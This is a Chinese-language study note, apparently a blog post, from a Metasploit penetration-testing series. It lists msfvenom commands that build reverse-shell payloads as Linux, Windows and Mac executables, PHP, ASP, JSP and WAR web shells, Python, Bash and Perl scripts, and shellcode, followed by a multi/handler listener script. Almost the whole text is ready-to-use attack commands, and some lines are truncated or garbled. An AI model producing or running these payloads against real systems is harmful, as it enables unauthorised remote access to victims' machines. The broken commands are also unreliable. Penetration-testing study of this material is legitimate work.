Metasploit渗透测试学习笔记——7、使用Metasploit生成各种payload

前言

在metasploit中,往往一个最有用的(初学者低估)功能模块是Metasploit的msfpayload模块。这个模块可以创建多个有效载荷,它可以帮助在任何情况下给你一个shell。对于每一个这些有效载荷可以进入msfconsole选择合理的利用,运行“设置有效载荷的必要选项(LHOST,LPORT,等),执行并等待要运行的有效负载。下面我们开始今天的介绍吧,我觉得每一个喜欢metasploit的人都应该保存这篇文章。

列出所有的payload

msfvenom -l

编译的可执行程序

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

php

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Shellcode

下面是shellcode生成的各种方法,针对了不同的平台
Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 

Handlers

Msfvenom可以将输出的代码是能够被切割和粘贴在对应的编程语言中直接使用,下面是设置的脚本

use exploit/multi/handler
set PAYLOAD 
set LHOST 
set LPORT 
set ExitOnSession false
exploit -j -z

使用上面的脚本,我们可以很简单的开始使用metasploit了。


你可能感兴趣的:(【信息安全】,【渗透测试工具使用指南】,———Metasploit)